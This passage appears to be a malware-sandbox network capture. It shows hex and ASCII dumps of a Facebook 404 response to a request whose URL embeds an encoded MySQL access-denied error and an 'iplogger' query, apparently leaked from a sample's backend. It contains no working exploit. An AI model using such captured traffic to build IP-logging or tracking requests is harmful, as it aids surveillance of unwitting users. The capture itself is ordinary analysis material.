font%20color=%22%23ff0000%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E HTTP/1.1 Connection: Keep-Alive Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36 Host: www.facebook.com
2022-10-07 13:59:18 UTC	455	IN	HTTP/1.1 404 Not Found Vary: Accept-Encoding report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]} x-fb-rlafr: 0 document-policy: force-load-at-top cross-origin-resource-policy: same-origin cross-origin-opener-policy: same-origin-allow-popups Pragma: no-cache Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT X-Content-Type-Options: nosniff X-XSS-Protection: 0 X-Frame-Options: DENY Strict-Transport-Security: max-age=15552000; preload Content-Type: text/html; charset="utf-8" X-FB-Debug: zmLcqRC9QViIit+ln0ZiOFQoBslTWw0G+d+ysNt7UUiIkVTmBKMHcVZyHiGGXV+EitPogRi+5yxsAZzzRY8Qew== Date: Fri, 07 Oct 2022 13:59:18 GMT Priority: u=3,i Transfer-Encoding: chunked Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Connection: close
2022-10-07 13:59:18 UTC	456	IN	Data Raw: 39 61 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 69 64 3d 22 66 61 63 65 62 6f 6f 6b 22 20 63 6c 61 73 73 3d 22 6e 6f 5f 6a 73 22 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 22 20 69 64 3d 22 6d 65 74 61 5f 72 65 66 65 72 72 65 72 22 20 2f 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 68 6c 44 4f 4f 4a 4e 77 22 3e 66 75 6e 63 74 69 6f 6e 20 65 6e 76 46 6c 75 73 68 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 62 5b 63 5d 3d 61 5b 63 5d 7d 77 69 6e 64 6f 77 2e 72 65 71 75 69 72 Data Ascii: 9a1<!DOCTYPE html><html lang="en" id="facebook" class="no_js"><head><meta charset="utf-8" /><meta name="referrer" content="default" id="meta_referrer" /><script nonce="hlDOOJNw">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requir
2022-10-07 13:59:18 UTC	456	IN	Data Raw: 75 6e 63 74 69 6f 6e 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 69 66 28 21 77 69 6e 64 6f 77 2e 6f 70 65 6e 44 61 74 61 62 61 73 65 29 72 65 74 75 72 6e 3b 62 2e 49 5f 41 4d 5f 49 4e 43 4f 47 4e 49 54 4f 5f 41 4e 44 5f 49 5f 52 45 41 4c 4c 59 5f 4e 45 45 44 5f 57 45 42 53 51 4c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 29 7b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 6f 70 65 6e 44 61 74 61 62 61 73 65 28 61 2c 62 2c 63 2c 64 29 7d 3b 77 69 6e 64 6f 77 2e 6f 70 65 6e 44 61 74 61 62 61 73 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 29 7d 7d 62 28 61 29 7d 29 28 74 68 69 73 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 68 6c 44 4f 4f 4a 4e 77 22 3e 3c 2f 73 74 79 6c Data Ascii: unction(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="hlDOOJNw"></styl
2022-10-07 13:59:18 UTC	458	IN	Data Raw: 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 26 23 30 33 39 3b 25 32 30 6c 69 6d 69 74 25 32 30 30 2c 31 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 66 6f 6e 74 25 32 30 63 6f 6c 6f 72 3d 25 32 32 25 32 33 66 66 30 30 30 30 25 32 32 25 33 45 25 35 42 54 45 50 25 32 30 53 54 4f 50 25 35 44 25 33 43 2f 66 6f 6e 74 25 33 45 25 30 41 25 33 43 2f 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 2f 66 6f 6e 74 25 33 45 3f 5f 66 62 5f 6e 6f 73 63 72 69 70 74 3d 31 22 20 2f 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 6c 69 6e Data Ascii: 2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20color=%22%23ff0000%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E?_fb_noscript=1" /></noscript><lin
2022-10-07 13:59:18 UTC	459	IN	Data Raw: 6c 6f 72 3d 25 32 32 25 32 33 30 30 30 30 30 30 25 32 32 25 33 45 25 30 41 25 33 43 62 25 33 45 31 30 34 35 25 32 30 2d 25 32 30 41 63 63 65 73 73 25 32 30 64 65 6e 69 65 64 25 32 30 66 6f 72 25 32 30 75 73 65 72 25 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a 25 32 30 59 45 53 29 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 73 65 6c 65 63 74 25 32 30 69 70 6c 6f 67 67 65 72 25 32 30 66 72 6f 6d 25 32 30 74 5f 63 68 61 6e 6e 65 6c 73 25 32 30 77 68 65 72 65 25 32 30 6e 61 6d 65 3d 26 23 30 33 39 3b 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 Data Ascii: lor=%22%23000000%22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86
2022-10-07 13:59:18 UTC	461	IN	Data Raw: 64 62 6e 65 77 30 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a 25 32 30 59 45 53 29 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 73 65 6c 65 63 74 25 32 30 69 70 6c 6f 67 67 65 72 25 32 30 66 72 6f 6d 25 32 30 74 5f 63 68 61 6e 6e 65 6c 73 25 32 30 77 68 65 72 65 25 32 30 6e 61 6d 65 3d 26 23 30 33 39 3b 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 26 23 30 33 39 3b 25 32 30 6c 69 6d 69 74 25 32 30 30 2c 31 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 66 6f 6e 74 25 Data Ascii: dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%
2022-10-07 13:59:18 UTC	462	IN	Data Raw: 68 4a 30 53 46 31 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 64 61 74 61 2d 62 6f 6f 74 6c 6f 61 64 65 72 2d 68 61 73 68 3d 22 6f 42 2f 79 58 67 33 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 6f 2f 6c 2f 30 2c 63 72 6f 73 73 2f 58 48 77 75 41 5f 5f 34 32 41 66 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 64 61 74 61 2d 62 6f 6f 74 6c 6f 61 64 65 72 2d 68 61 73 68 3d 22 34 42 47 54 6d 43 37 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 Data Ascii: hJ0SF1.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="oB/yXg3" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yo/l/0,cross/XHwuA__42Af.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="4BGTmC7" /><link type="text/css" re
2022-10-07 13:59:18 UTC	464	IN	Data Raw: 73 68 22 3a 22 41 54 34 5f 5a 51 69 30 73 54 6a 53 74 2d 52 78 58 70 49 22 7d 2c 22 38 31 32 36 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 34 55 37 71 47 30 36 70 39 73 46 36 75 38 4a 36 51 22 7d 2c 22 36 37 36 38 33 38 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 6e 4e 31 65 68 54 39 79 71 2d 32 71 36 57 2d 4d 22 7d 2c 22 31 32 31 37 31 35 37 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 42 37 59 6d 6c 6c 4f 73 41 72 6e 4b 36 49 66 63 22 7d 2c 22 31 35 35 34 38 32 37 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 37 7a 75 65 47 4c 68 47 6f 30 63 54 35 78 67 2d 67 22 7d 2c 22 31 37 33 38 34 38 36 Data Ascii: sh":"AT4_ZQi0sTjSt-RxXpI"},"8126":{"result":false,"hash":"AT4U7qG06p9sF6u8J6Q"},"676838":{"result":false,"hash":"AT6nN1ehT9yq-2q6W-M"},"1217157":{"result":false,"hash":"AT6B7YmllOsArnK6Ifc"},"1554827":{"result":false,"hash":"AT7zueGLhGo0cT5xg-g"},"1738486
2022-10-07 13:59:18 UTC	465	IN	Data Raw: 3a 35 31 38 34 30 30 30 2c 22 73 22 3a 22 4c 61 78 22 7d 2c 22 77 64 22 3a 7b 22 74 22 3a 36 30 34 38 30 30 2c 22 73 22 3a 22 4c 61 78 22 7d 2c 22 78 2d 72 65 66 65 72 65 72 22 3a 7b 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 78 2d 73 72 63 22 3a 7b 22 74 22 3a 31 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 7d 2c 32 31 30 34 5d 2c 5b 22 43 75 72 72 65 6e 74 43 6f 6d 6d 75 6e 69 74 79 49 6e 69 74 69 61 6c 44 61 74 61 22 2c 5b 5d 2c 7b 7d 2c 34 39 30 5d 2c 5b 22 43 75 72 72 65 6e 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 2c 5b 5d 2c 7b 22 66 61 63 65 62 6f 6f 6b 64 6f 74 63 6f 6d 22 3a 74 72 75 65 2c 22 6d 65 73 73 65 6e 67 65 72 64 6f 74 63 6f 6d 22 3a 66 61 6c 73 65 2c 22 77 6f 72 6b 70 6c 61 63 65 64 6f 74 63 6f 6d 22 3a 66 61 6c 73 65 2c 22 69 6e 73 74 61 67 72 61 6d Data Ascii: :5184000,"s":"Lax"},"wd":{"t":604800,"s":"Lax"},"x-referer":{"s":"None"},"x-src":{"t":1,"s":"None"}},2104],["CurrentCommunityInitialData",[],{},490],["CurrentEnvironment",[],{"facebookdotcom":true,"messengerdotcom":false,"workplacedotcom":false,"instagram
2022-10-07 13:59:18 UTC	467	IN	Data Raw: 74 22 2c 22 76 65 72 73 69 6f 6e 22 3a 32 2c 22 73 68 6f 75 6c 64 5f 72 61 6e 64 6f 6d 69 7a 65 22 3a 66 61 6c 73 65 7d 2c 32 31 31 31 5d 2c 5b 22 55 73 65 72 41 67 65 6e 74 44 61 74 61 22 2c 5b 5d 2c 7b 22 62 72 6f 77 73 65 72 41 72 63 68 69 74 65 63 74 75 72 65 22 3a 22 36 34 22 2c 22 62 72 6f 77 73 65 72 46 75 6c 6c 56 65 72 73 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 62 72 6f 77 73 65 72 4d 69 6e 6f 72 56 65 72 73 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 62 72 6f 77 73 65 72 4e 61 6d 65 22 3a 22 55 6e 6b 6e 6f 77 6e 22 2c 22 62 72 6f 77 73 65 72 56 65 72 73 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 64 65 76 69 63 65 4e 61 6d 65 22 3a 22 55 6e 6b 6e 6f 77 6e 22 2c 22 65 6e 67 69 6e 65 4e 61 6d 65 22 3a 22 55 6e 6b 6e 6f 77 6e 22 2c 22 65 6e 67 69 6e 65 56 65 72 73 69 6f 6e 22 Data Ascii: t","version":2,"should_randomize":false},2111],["UserAgentData",[],{"browserArchitecture":"64","browserFullVersion":null,"browserMinorVersion":null,"browserName":"Unknown","browserVersion":null,"deviceName":"Unknown","engineName":"Unknown","engineVersion"
2022-10-07 13:59:18 UTC	468	IN	Data Raw: 54 45 22 2c 22 53 52 54 5f 42 41 4e 5a 41 49 5f 53 52 54 5f 43 4f 52 45 5f 4c 4f 47 47 45 52 22 2c 22 53 52 54 5f 42 41 4e 5a 41 49 5f 53 52 54 5f 4d 41 49 4e 5f 4c 4f 47 47 45 52 22 2c 22 57 4f 52 4b 50 4c 41 43 45 5f 50 4c 41 54 46 4f 52 4d 5f 53 45 43 55 52 45 5f 41 50 50 53 5f 4d 41 49 4c 42 4f 58 45 53 22 2c 22 50 4f 43 4b 45 54 5f 4d 4f 4e 53 54 45 52 53 5f 55 50 44 41 54 45 5f 4e 41 4d 45 22 2c 22 49 43 5f 44 49 53 41 42 4c 45 5f 4d 45 52 47 45 5f 54 4f 4f 4c 5f 46 45 45 44 5f 43 48 45 43 4b 5f 46 4f 52 5f 52 45 50 4c 41 43 45 5f 53 43 48 45 44 55 4c 45 22 2c 22 41 44 53 5f 45 50 44 5f 49 4d 50 41 43 54 45 44 5f 41 44 56 45 52 54 49 53 45 52 5f 4d 49 47 52 41 54 45 5f 58 43 4f 4e 54 52 4f 4c 4c 45 52 22 2c 22 52 45 43 52 55 49 54 49 4e 47 5f 43 41 Data Ascii: TE","SRT_BANZAI_SRT_CORE_LOGGER","SRT_BANZAI_SRT_MAIN_LOGGER","WORKPLACE_PLATFORM_SECURE_APPS_MAILBOXES","POCKET_MONSTERS_UPDATE_NAME","IC_DISABLE_MERGE_TOOL_FEED_CHECK_FOR_REPLACE_SCHEDULE","ADS_EPD_IMPACTED_ADVERTISER_MIGRATE_XCONTROLLER","RECRUITING_CA
2022-10-07 13:59:18 UTC	470	IN	Data Raw: 74 63 68 69 74 2e 73 6b 79 2e 63 6f 6d 22 2c 22 67 72 61 70 68 69 74 65 2e 69 6e 73 74 61 67 72 61 6d 2e 63 6f 6d 22 2c 22 77 77 77 2e 6b 66 63 2e 63 6f 2e 74 68 22 2c 22 6c 65 61 72 6e 2e 70 61 6e 74 68 65 6f 6e 2e 69 6f 22 2c 22 77 77 77 2e 6c 61 6e 64 6d 61 72 6b 73 68 6f 70 73 2e 69 6e 22 2c 22 77 77 77 2e 6e 63 6c 2e 63 6f 6d 22 2c 22 73 30 2e 77 70 2e 63 6f 6d 22 2c 22 77 77 77 2e 74 61 74 61 63 6c 69 71 2e 63 6f 6d 22 2c 22 62 73 2e 73 65 72 76 69 6e 67 2d 73 79 73 2e 63 6f 6d 22 2c 22 6b 6f 68 6c 73 2e 63 6f 6d 22 2c 22 6c 61 7a 61 64 61 2e 63 6f 2e 74 68 22 2c 22 78 67 34 6b 65 6e 2e 63 6f 6d 22 2c 22 74 65 63 68 6e 6f 70 61 72 6b 2e 72 75 22 2c 22 6f 66 66 69 63 65 64 65 70 6f 74 2e 63 6f 6d 2e 6d 78 22 2c 22 62 65 73 74 62 75 79 2e 63 6f 6d 2e Data Ascii: tchit.sky.com","graphite.instagram.com","www.kfc.co.th","learn.pantheon.io","www.landmarkshops.in","www.ncl.com","s0.wp.com","www.tatacliq.com","bs.serving-sys.com","kohls.com","lazada.co.th","xg4ken.com","technopark.ru","officedepot.com.mx","bestbuy.com.
2022-10-07 13:59:18 UTC	471	IN	Data Raw: 5c 73 5d 7c 5e 29 22 2c 22 5c 2f 5f 45 5c 2f 22 3a 22 28 5b 2e 2c 21 3f 5c 5c 73 5d 7c 24 29 22 7d 2c 22 70 61 74 74 65 72 6e 73 22 3a 7b 22 5c 2f 5c 75 30 30 30 31 28 2e 2a 29 28 27 7c 26 23 30 33 39 3b 29 73 5c 75 30 30 30 31 28 3f 3a 27 7c 26 23 30 33 39 3b 29 73 28 2e 2a 29 5c 2f 22 3a 22 5c 75 30 30 30 31 24 31 24 32 73 5c 75 30 30 30 31 24 33 22 2c 22 5c 2f 5f 5c 75 30 30 30 31 28 5b 5e 5c 75 30 30 30 31 5d 2a 29 5c 75 30 30 30 31 5c 2f 22 3a 22 6a 61 76 61 73 63 72 69 70 74 22 7d 7d 2c 31 34 39 36 5d 2c 5b 22 49 6e 74 6c 56 69 65 77 65 72 43 6f 6e 74 65 78 74 22 2c 5b 5d 2c 7b 22 47 45 4e 44 45 52 22 3a 33 2c 22 72 65 67 69 6f 6e 61 6c 4c 6f 63 61 6c 65 22 3a 6e 75 6c 6c 7d 2c 37 37 32 5d 2c 5b 22 4e 75 6d 62 65 72 46 6f 72 6d 61 74 43 6f 6e 66 69 Data Ascii: \s]\|^)","\/_E\/":"([.,!?\\s]\|$)"},"patterns":{"\/\u0001(.)('\|')s\u0001(?:'\|')s(.)\/":"\u0001$1$2s\u0001$3","\/_\u0001([^\u0001]*)\u0001\/":"javascript"}},1496],["IntlViewerContext",[],{"GENDER":3,"regionalLocale":null},772],["NumberFormatConfi
2022-10-07 13:59:18 UTC	472	IN	Data Raw: 62 6c 6f 63 6b 5c 2f 22 3a 31 2c 22 5c 2f 65 78 69 74 64 73 69 74 65 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 62 61 6c 61 6e 63 65 5c 2f 70 69 78 65 6c 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 62 61 6c 61 6e 63 65 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 62 61 6c 61 6e 63 65 5c 2f 63 61 72 72 69 65 72 5f 6c 61 6e 64 69 6e 67 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 66 6c 65 78 5c 2f 6c 6f 67 67 69 6e 67 5c 2f 22 3a 31 2c 22 5c 2f 74 72 22 3a 31 2c 22 5c 2f 74 72 5c 2f 22 3a 31 2c 22 5c 2f 73 65 6d 5f 63 61 6d 70 61 69 67 6e 73 5c 2f 73 65 6d 5f 70 69 78 65 6c 5f 74 65 73 74 5c 2f 22 3a 31 2c 22 5c 2f 62 6f 6f 6b 6d 61 72 6b 73 5c 2f 66 6c 79 6f 75 74 5c 2f 62 6f 64 79 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 73 75 62 6e 6f 5c 2f 22 3a 31 2c Data Ascii: block\/":1,"\/exitdsite":1,"\/zero\/balance\/pixel\/":1,"\/zero\/balance\/":1,"\/zero\/balance\/carrier_landing\/":1,"\/zero\/flex\/logging\/":1,"\/tr":1,"\/tr\/":1,"\/sem_campaigns\/sem_pixel_test\/":1,"\/bookmarks\/flyout\/body\/":1,"\/zero\/subno\/":1,
2022-10-07 13:59:18 UTC	474	IN	Data Raw: 2f 6c 6f 61 6e 5c 2f 62 75 79 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 73 6d 73 5c 2f 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 61 5c 2f 63 68 61 6e 6e 65 6c 5c 2f 72 65 63 6f 6e 6e 65 63 74 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 61 5c 2f 6e 75 78 5c 2f 77 69 7a 61 72 64 5c 2f 6e 61 76 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 61 70 70 72 65 67 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 62 69 72 74 68 64 61 79 5f 68 65 6c 70 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 63 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 63 6f 6e 66 69 72 6d 65 6d 61 69 6c 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 63 72 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 6c 6f 67 69 6e 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 72 2e 70 68 Data Ascii: /loan\/buy\/":1,"\/upsell\/sms\/":1,"\/wap\/a\/channel\/reconnect.php":1,"\/wap\/a\/nux\/wizard\/nav.php":1,"\/wap\/appreg.php":1,"\/wap\/birthday_help.php":1,"\/wap\/c.php":1,"\/wap\/confirmemail.php":1,"\/wap\/cr.php":1,"\/wap\/login.php":1,"\/wap\/r.ph
2022-10-07 13:59:18 UTC	475	IN	Data Raw: 7a 62 58 73 22 2c 22 61 70 70 5f 69 64 22 3a 22 32 35 36 32 38 31 30 34 30 35 35 38 22 2c 22 65 6e 61 62 6c 65 5f 62 6c 61 64 65 72 75 6e 6e 65 72 22 3a 66 61 6c 73 65 2c 22 65 6e 61 62 6c 65 5f 61 63 6b 22 3a 74 72 75 65 2c 22 70 75 73 68 5f 70 68 61 73 65 22 3a 22 43 33 22 2c 22 65 6e 61 62 6c 65 5f 6f 62 73 65 72 76 65 72 22 3a 66 61 6c 73 65 2c 22 65 6e 61 62 6c 65 5f 64 61 74 61 6c 6f 73 73 5f 74 69 6d 65 72 22 3a 66 61 6c 73 65 2c 22 65 6e 61 62 6c 65 5f 66 61 6c 6c 62 61 63 6b 5f 66 6f 72 5f 62 72 22 3a 74 72 75 65 2c 22 66 69 78 5f 62 72 5f 69 6e 69 74 5f 72 63 22 3a 66 61 6c 73 65 2c 22 71 75 65 75 65 5f 61 63 74 69 76 61 74 69 6f 6e 5f 65 78 70 65 72 69 6d 65 6e 74 22 3a 66 61 6c 73 65 2c 22 6d 61 78 5f 64 65 6c 61 79 5f 62 72 5f 71 75 65 75 65 Data Ascii: zbXs","app_id":"256281040558","enable_bladerunner":false,"enable_ack":true,"push_phase":"C3","enable_observer":false,"enable_dataloss_timer":false,"enable_fallback_for_br":true,"fix_br_init_rc":false,"queue_activation_experiment":false,"max_delay_br_queue
2022-10-07 13:59:18 UTC	477	IN	Data Raw: 63 22 3a 5b 22 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 42 6c 75 65 22 2c 22 41 61 32 5f 64 4f 4b 50 4c 6f 6c 67 36 55 67 68 46 41 75 70 37 2d 77 50 4e 67 39 4c 39 63 47 31 4d 30 38 66 4e 31 2d 73 43 35 4b 6b 72 4b 75 35 4f 77 54 50 38 68 48 69 45 78 6d 78 61 4a 45 51 4e 52 61 61 4b 2d 42 48 42 34 59 50 75 78 56 75 57 56 6b 32 4f 72 34 52 5f 50 59 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 31 38 33 35 37 39 22 2c 5b 22 49 6e 6c 69 6e 65 46 62 74 52 65 73 75 6c 74 49 6d 70 6c 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 49 6e 6c 69 6e 65 46 62 74 52 65 73 75 6c 74 49 6d 70 6c 22 2c 22 41 61 32 5f 64 4f 4b 50 4c 6f 6c 67 36 55 67 68 46 41 75 70 37 2d 77 50 4e 67 39 4c 39 63 47 31 4d 30 38 66 4e 31 2d 73 43 35 4b 6b 72 4b 75 35 4f 77 54 50 38 68 48 69 45 78 6d 78 61 Data Ascii: c":["clearIntervalBlue","Aa2_dOKPLolg6UghFAup7-wPNg9L9cG1M08fN1-sC5KkrKu5OwTP8hHiExmxaJEQNRaaK-BHB4YPuxVuWVk2Or4R_PY"]},-1],["cr:1183579",["InlineFbtResultImpl"],{"__rc":["InlineFbtResultImpl","Aa2_dOKPLolg6UghFAup7-wPNg9L9cG1M08fN1-sC5KkrKu5OwTP8hHiExmxa
2022-10-07 13:59:18 UTC	478	IN	Data Raw: 69 6f 6e 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 7d 2c 32 33 39 33 5d 2c 5b 22 49 6e 74 6c 43 75 72 72 65 6e 74 4c 6f 63 61 6c 65 22 2c 5b 5d 2c 7b 22 63 6f 64 65 22 3a 22 65 6e 5f 55 53 22 7d 2c 35 39 35 34 5d 2c 5b 22 55 53 49 44 4d 65 74 61 64 61 74 61 22 2c 5b 5d 2c 7b 22 62 72 6f 77 73 65 72 5f 69 64 22 3a 22 3f 22 2c 22 74 61 62 5f 69 64 22 3a 22 22 2c 22 70 61 67 65 5f 69 64 22 3a 22 50 72 6a 64 79 75 75 69 69 36 63 64 66 22 2c 22 74 72 61 6e 73 69 74 69 6f 6e 5f 69 64 22 3a 30 2c 22 76 65 72 73 69 6f 6e 22 3a 36 7d 2c 35 38 38 38 5d 2c 5b 22 63 72 3a 36 38 36 22 2c 5b 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 6e 75 6c 6c 2c 22 41 61 33 57 78 61 68 5f 7a 38 73 4d 6f 47 6b 72 6c 6e 6b 54 32 41 42 5a 76 58 5f 50 4f 44 47 46 72 75 37 37 50 6b 38 76 76 33 67 49 37 Data Ascii: ionConfig",[],{},2393],["IntlCurrentLocale",[],{"code":"en_US"},5954],["USIDMetadata",[],{"browser_id":"?","tab_id":"","page_id":"Prjdyuuii6cdf","transition_id":0,"version":6},5888],["cr:686",[],{"__rc":[null,"Aa3Wxah_z8sMoGkrlnkT2ABZvX_PODGFru77Pk8vv3gI7
2022-10-07 13:59:18 UTC	480	IN	Data Raw: 22 20 74 69 74 6c 65 3d 22 47 6f 20 74 6f 20 46 61 63 65 62 6f 6f 6b 20 68 6f 6d 65 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 62 5f 6c 6f 67 6f 20 69 6d 67 20 73 70 5f 6f 74 31 74 35 59 6a 59 4c 33 73 20 73 78 5f 39 31 36 37 64 36 22 3e 3c 75 3e 46 61 63 65 62 6f 6f 6b 3c 2f 75 3e 3c 2f 69 3e 3c 2f 61 3e 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 79 6c 34 20 72 66 6c 6f 61 74 20 5f 6f 68 66 22 20 64 61 74 61 2d 74 65 73 74 69 64 3d 22 72 6f 79 61 6c 5f 6c 6f 67 69 6e 5f 66 6f 72 6d 22 3e 3c 61 20 68 72 65 66 3d 22 2f 22 20 69 64 3d 22 75 5f 30 5f 30 5f 2f 6a 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 77 68 69 74 65 22 3e 4a 6f 69 6e 20 6f 72 20 4c 6f 67 20 49 6e 74 6f 20 46 61 63 65 62 6f 6f 6b 20 e2 80 89 Data Ascii: " title="Go to Facebook home"><i class="fb_logo img sp_ot1t5YjYL3s sx_9167d6"><u>Facebook</u></i></a></h1></div><div class="_yl4 rfloat _ohf" data-testid="royal_login_form"><a href="/" id="u_0_0_/j"><span style="color: white">Join or Log Into Facebook
